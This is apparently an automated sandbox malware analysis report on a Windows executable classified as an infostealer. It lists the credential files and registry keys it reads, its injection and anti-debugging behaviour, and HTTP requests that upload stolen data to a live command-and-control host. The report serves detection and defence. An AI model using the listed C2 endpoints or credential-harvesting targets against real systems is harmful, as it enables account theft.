Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 35743
Start time: 22:54:52
Joe Sandbox Product: CloudBasic
Start date: 31.10.2017
Overall analysis duration: 0h 5m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 55SKM_C281171022232400.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal76.evad.phis.spyw.troj.winEXE@7/3@1/1
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 111
  • Number of non-executed functions: 259
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 98.8% (good quality ratio 95.4%)
  • Quality average: 85.1%
  • Quality standard deviation: 24.2%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): svchost.exe, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: 55SKM_C281171022232400.exe, 55SKM_C281171022232400.exe


Detection

Strategy    Score   Range      Reporting        Detection
Threshold   76      0 - 100    Report FP / FN   malicious


Confidence

Strategy    Score   Range    Further Analysis Required?   Confidence
Threshold   5       0 - 5    false


Classification

Signature Overview



Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_0040ABFF GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,4_2_0040ABFF
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeWindow created: window name: CLIPBRDWNDCLASS

Networking:

Downloads files from webservers via HTTP
Source: global trafficHTTP traffic detected: GET /ph7cms/data/system/modules/web/post.php?type=notification&machinename=473627&machinetime=10:56%20PM HTTP/1.1Host: alsharfigroup.comConnection: Keep-Alive
Found strings which match known social media URLs
Source: 55SKM_C281171022232400.exeString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Fa
Source: 55SKM_C281171022232400.exeString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo
Source: 55SKM_C281171022232400.exeString found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: alsharfigroup.com
Posts data to webserver
Source: unknownHTTP traffic detected: GET /ph7cms/data/system/modules/web/post.php?type=notification&machinename=473627&machinetime=10:56%20PM HTTP/1.1Host: alsharfigroup.comConnection: Keep-Alive
URLs found in memory or binary data
Source: 55SKM_C281171022232400.exeString found in binary or memory: file://
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Users/Sam
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwel
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/en/ECX%20alsharfigroup.resources/ECX%20alsharfigroup.resource
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/
Source: 55SKM_C281171022232400.exeString found in binary or memory: file:///C:/Windows/assembl
Source: 55SKM_C281171022232400.exeString found in binary or memory: ftp://
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com/ph7cms/data/system/modules/web/
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://alsharfigroup.com/ph7cms/data/system/modules/web/post.php?type=notification&machinename=47362
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://go.micr
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://https://:stringdatawininetcachecredentialsftp://dpapi:captionmenu_%ddialog_%dstringsgeneralsy
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://ns.adobe.A
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://ns.adobe.c/se
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://www.facebook.com/
Source: 55SKM_C281171022232400.exeString found in binary or memory: http://www.nirsoft.net/
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://dmp.theadex.com/r/104/2491/?c=10011142920
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://login.yahoo.com/config/login
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
Source: 55SKM_C281171022232400.exeString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/l
HTTP GET or POST without a user agent
Source: global trafficHTTP traffic detected: GET /ph7cms/data/system/modules/web/post.php?type=notification&machinename=473627&machinetime=10:56%20PM HTTP/1.1Host: alsharfigroup.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /ph7cms/data/system/modules/web/image/upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8d520b2906d1d70Host: alsharfigroup.comContent-Length: 1672888Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /ph7cms/data/system/modules/web/image/upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8d520b2cd604d00Host: alsharfigroup.comContent-Length: 1672469Expect: 100-continue

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc.)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\wazh7fcp.default\secmod.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\secmod.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\places.sqlite
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\cert8.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\wazh7fcp.default\cert8.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\wazh7fcp.default\cert7.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\key3.db
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Paltalk
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Identities\{894C55D4-9D8A-49AE-A9C5-628BB0C1BD8F}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via registry)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword4_2_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword4_2_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: ESMTPPassword4_2_00403396
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword4_1_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword4_1_00402D59
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: ESMTPPassword4_1_00403396

Data Obfuscation:

Binary may include packed or encrypted code
Source: initial sampleStatic PE information: section name: .text entropy: 6.92902039348
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_004047D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,4_2_004047D8
PE file contains an invalid checksum
Source: 55SKM_C281171022232400.exeStatic PE information: real checksum: 0xfdd0f should be: 0xfc9ff
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00411939 push ecx; ret 4_2_00411949
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00411960 push eax; ret 4_2_00411974
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00411960 push eax; ret 4_2_0041199C
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00411939 push ecx; ret 4_1_00411949
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00411960 push eax; ret 4_1_00411974
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00411960 push eax; ret 4_1_0041199C
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00449C94 push eax; iretd 5_2_00449C95
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00447E64 push eax; ret 5_2_00447E71
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004433C0 push eax; ret 5_2_004433D4
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004433C0 push eax; ret 5_2_004433FC
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00444B2C push eax; iretd 5_2_00444B2D
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004431A1 push ecx; ret 5_2_004431B1
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00449C94 push eax; iretd 5_1_00449C95
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00447E64 push eax; ret 5_1_00447E71
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004433C0 push eax; ret 5_1_004433D4
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004433C0 push eax; ret 5_1_004433FC
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00444B2C push eax; iretd 5_1_00444B2D
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004431A1 push ecx; ret 5_1_004431B1

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_1_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_2_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_2_004080D9
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_1_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_1_004080D9

System Summary:

Found graphical window changes (likely an installer)
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Uses new MSVCR DLLs
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
Binary contains paths to debug symbols
Source: Binary string: mscorrc.pdb source: 55SKM_C281171022232400.exe
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: 55SKM_C281171022232400.exe
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 55SKM_C281171022232400.exe
Classification label
Source: classification engineClassification label: mal76.evad.phis.spyw.troj.winEXE@7/3@1/1
Contains functionality for error logging
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00416421 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_00416421
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004168AB GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,5_2_004168AB
Contains functionality to enumerate processes or threads
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00411AB8 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00411AB8
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_0040ED94 FindResourceA,SizeofResource,LoadResource,LockResource,4_2_0040ED94
PE file has an executable .text section and no other executable section
Source: 55SKM_C281171022232400.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the VB runtime library 6.0 (probably coded in Visual Basic)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\System32\msvbvm60.dll
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policies
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary data
Source: 55SKM_C281171022232400.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 55SKM_C281171022232400.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 55SKM_C281171022232400.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 55SKM_C281171022232400.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 55SKM_C281171022232400.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 55SKM_C281171022232400.exeBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 55SKM_C281171022232400.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Spawns processes
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe'
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe'
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Mails.txt
Source: unknownProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Browsers.txt
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe'
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Mails.txt
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess created: C:\Users\user\Desktop\55SKM_C281171022232400.exe 'C:\Users\user\Desktop\55SKM_C281171022232400.exe' /stext C:\ProgramData\Browsers.txt
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Creates mutexes
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 0042DF27 appears 32 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00414751 appears 68 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00442E9E appears 38 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00411672 appears 32 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00407974 appears 58 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 004433C0 appears 74 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00442E8C appears 34 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 0041163C appears 68 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00411960 appears 34 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00414AFA appears 176 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 004148B2 appears 132 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 004115F2 appears 34 times
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: String function: 00442EAA appears 66 times
PE file contains strange resources
Source: 55SKM_C281171022232400.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file name differs from the original file name gathered from version info
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameuser32j% vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameECX alsharfigroup.exe4 vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameECX alsharfigroup.exe4 vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamemscorrc.dllT vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamemscorwks.dllT vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameKernelbasej% vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilename vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFileName vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 55SKM_C281171022232400.exe
Source: 55SKM_C281171022232400.exeBinary or memory string: OriginalFilenamePreperceive.exe vs 55SKM_C281171022232400.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeFile read: C:\Users\user\Desktop\55SKM_C281171022232400.exe
Potential malicious icon found
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: 55SKM_C281171022232400.exeBinary or memory string: %kJIProgram Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Program ManagerP
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Managerh1%k
Source: 55SKM_C281171022232400.exeBinary or memory string: Window title: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Progman
Source: 55SKM_C281171022232400.exeBinary or memory string: w title: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: %k%$Window title: Program Manager End:] 0j
Source: 55SKM_C281171022232400.exeBinary or memory string: Program ManagerX
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Manager End:]
Source: 55SKM_C281171022232400.exeBinary or memory string: Program Manager
Source: 55SKM_C281171022232400.exeBinary or memory string: Shell_TrayWnd
Source: 55SKM_C281171022232400.exeBinary or memory string: %kLKProgram Manager End:]
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMemory written: C:\Users\user\Desktop\55SKM_C281171022232400.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMemory written: C:\Users\user\Desktop\55SKM_C281171022232400.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread register set: target process: 3280

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeSystem information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_004047D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,4_2_004047D8
Enables debug privileges
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_1_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_2_00408752
